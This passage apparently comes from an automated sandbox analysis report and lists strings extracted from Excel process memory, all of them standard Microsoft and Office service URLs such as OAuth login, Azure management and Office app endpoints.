      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeV_?
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeXKA
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize_TF
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeb
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizefic
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeh7
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizehP
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizehV
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeize
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizejT
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizel
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizelR
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizemQ
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizemS
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizenR
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeq
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizes
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizexU
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeyT
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize~Q
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://management.azure.com
      Source: EXCEL.EXE, 00000000.00000002.933748369.0000000013149000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://management.azure.com/
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://management.azure.com/t$
      Source: EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://messaging.office.com/
      Source: EXCEL.EXE, 00000000.00000002.933761146.0000000013153000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782387248.0000000013153000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://metadata.templates.cdn.office.net/client/logLR1
      Source: EXCEL.EXE, 00000000.00000003.787102445.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807889222.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662721741.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.933958853.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782581219.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743536985.000000001325D000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://ncus.contentsync.
      Source: EXCEL.EXE, 00000000.00000002.933931227.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782557094.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807864897.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662707230.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787086454.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743519317.0000000013235000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://ncus.pagecontentsync.
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com
      Source: EXCEL.EXE, 00000000.00000003.743389311.0000000013161000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules18
      Source: EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.4954.1000&ClientId=
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.933761146.0000000013153000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782387248.0000000013153000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://ocos-office365-s2s.msedge.net/abev
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/U
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.746911179.000000000F932000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742923018.000000000F8D5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.784656249.000000000F932000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.932672209.000000000F8D5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.930238046.000000000DA26000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742968046.000000000F932000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.784582330.000000000F8D5000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://officeapps.live.com
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com)l7
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com3l9
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com9cG
      Source: EXCEL.EXE, 00000000.00000002.933545976.0000000013026000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com:
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comK
      Source: EXCEL.EXE, 00000000.00000003.742968046.000000000F932000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comN
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comP6
      Source: EXCEL.EXE, 00000000.00000002.933545976.0000000013026000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comary
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.commlk
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://officeci.azurewebsites.net/api/B
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksB
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/Q
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
